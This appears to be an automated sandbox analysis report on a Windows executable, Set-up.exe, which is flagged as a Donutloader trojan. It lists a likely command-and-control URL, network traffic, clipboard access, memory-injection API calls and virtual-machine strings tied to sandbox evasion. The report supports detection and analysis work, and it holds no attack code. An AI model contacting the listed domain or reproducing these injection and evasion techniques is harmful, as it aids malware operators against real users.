Source: Set-up.exe, 00000000.00000003.1882257795.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vennurviot.sbs/api/4
Source: Set-up.exe, 00000000.00000003.1882257795.0000000000D92000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1891644416.0000000000D88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vennurviot.sbs/apiP
Source: Set-up.exe, 00000000.00000003.1933909044.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933909044.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1934108862.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: Set-up.exe, 00000000.00000003.1933909044.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1934108862.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: Set-up.exe	String found in binary or memory: https://www.smartsharesystems.com/
Source: Set-up.exe	String found in binary or memory: https://www.smartsharesystems.com/Morten
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.152.13:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.77.78:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.140.193:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.221:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.141.136:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49747 version: TLS 1.2

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_00A71DD0 OpenClipboard,Sleep,OpenClipboard,

0_2_00A71DD0

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_00A73200 EmptyClipboard,SetClipboardData,GlobalUnlock,SetClipboardData,SetClipboardData,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,SetClipboardData,SetClipboardData,CloseClipboard,

0_2_00A73200

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_00A71E10 IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,GetClipboardData,GlobalLock,GlobalUnlock,_invalid_parameter_noinfo_noreturn,CloseClipboard,

0_2_00A71E10

Source: Set-up.exe, 00000000.00000000.1722720645.0000000000C64000.00000002.00000001.01000000.00000003.sdmp

Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \

memstr_ca5a4307-c

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_02A25F73 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,

0_2_02A25F73

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00A93070	0_2_00A93070
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00A85050	0_2_00A85050
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00A673E0	0_2_00A673E0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00BE23E0	0_2_00BE23E0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00A6E410	0_2_00A6E410
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00A89460	0_2_00A89460
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00A645D0	0_2_00A645D0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00A93990	0_2_00A93990
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00AC0BE0	0_2_00AC0BE0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00A78B40	0_2_00A78B40
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00AC6E10	0_2_00AC6E10
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_029D0575	0_2_029D0575
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_02A25F73	0_2_02A25F73
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_029D50D2	0_2_029D50D2
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_029D0000	0_2_029D0000
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_02A131B2	0_2_02A131B2
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_029E21DD	0_2_029E21DD
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_029D91C2	0_2_029D91C2
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_029E31E3	0_2_029E31E3
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_02A0B122	0_2_02A0B122
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_029E86B3	0_2_029E86B3
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_029FD6A2	0_2_029FD6A2
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_029D87C2	0_2_029D87C2
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_029E2732	0_2_029E2732
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_029F3752	0_2_029F3752
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_029DC4A2	0_2_029DC4A2
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_029D8422	0_2_029D8422
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_029DB457	0_2_029DB457
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_029DD472	0_2_029DD472
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_029E05C2	0_2_029E05C2
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_02A13532	0_2_02A13532
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_02A15572	0_2_02A15572
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_029F0A92	0_2_029F0A92
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_029F0A90	0_2_029F0A90
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_02A06AD2	0_2_02A06AD2
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_02A13A02	0_2_02A13A02
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_02A15B12	0_2_02A15B12
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_02A04B52	0_2_02A04B52

Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00BDAA50 appears 35 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 029DDF62 appears 48 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 029DF712 appears 57 times

Source: C:\Users\user\Desktop\Set-up.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1012 -s 1600

Source: Set-up.exe

Static PE information: invalid certificate

Source: Set-up.exe, 00000000.00000000.1722720645.0000000000C64000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSciTE.EXE, vs Set-up.exe
Source: Set-up.exe, 00000000.00000003.1828821448.0000000002ED3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSciTE.EXE, vs Set-up.exe
Source: Set-up.exe	Binary or memory string: OriginalFilenameSciTE.EXE, vs Set-up.exe

Source: Set-up.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13

Source: classification engine

Classification label: mal100.troj.evad.winEXE@2/5@11/9

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_029D0C85 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,

0_2_029D0C85

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_00A6D420 CLSIDFromProgID,CoCreateInstance,SysAllocString,SysAllocString,SysFreeString,SysFreeString,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

0_2_00A6D420

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1012

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\2b07a11f-329c-489a-8c69-e7250a7a3a90

Jump to behavior

Source: Set-up.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Set-up.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Set-up.exe	ReversingLabs: Detection: 34%
Source: Set-up.exe	Virustotal: Detection: 41%

Source: C:\Users\user\Desktop\Set-up.exe

File read: C:\Users\user\Desktop\Set-up.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Set-up.exe "C:\Users\user\Desktop\Set-up.exe"
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1012 -s 1600

Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: Set-up.exe

Static PE information: More than 149 > 100 exports found

Source: Set-up.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Set-up.exe

Static file information: File size 2729072 > 1048576

Source: Set-up.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1ab800

Source: Set-up.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Set-up.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Set-up.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Set-up.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Set-up.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Set-up.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Set-up.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: Set-up.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: Set-up.exe

Source: Set-up.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Set-up.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Set-up.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Set-up.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Set-up.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: Set-up.exe

Static PE information: real checksum: 0x2a5ee3 should be: 0x29f6a1

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00A69D45 push dword ptr [ebp+esi*4-75h]; iretd		0_2_00A69D49
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_02A0F452 push eax; mov dword ptr [esp], 37363908h		0_2_02A0F457

Source: C:\Users\user\Desktop\Set-up.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

API coverage: 1.2 %

Source: C:\Users\user\Desktop\Set-up.exe TID: 4444

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Set-up.exe, 00000000.00000003.1933909044.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2124248780.0000000000D28000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1849993860.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1882257795.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2124248780.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1891644416.0000000000D88000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Set-up.exe, 00000000.00000003.1933909044.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1849993860.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1882257795.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2124248780.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1891644416.0000000000D88000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWR
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
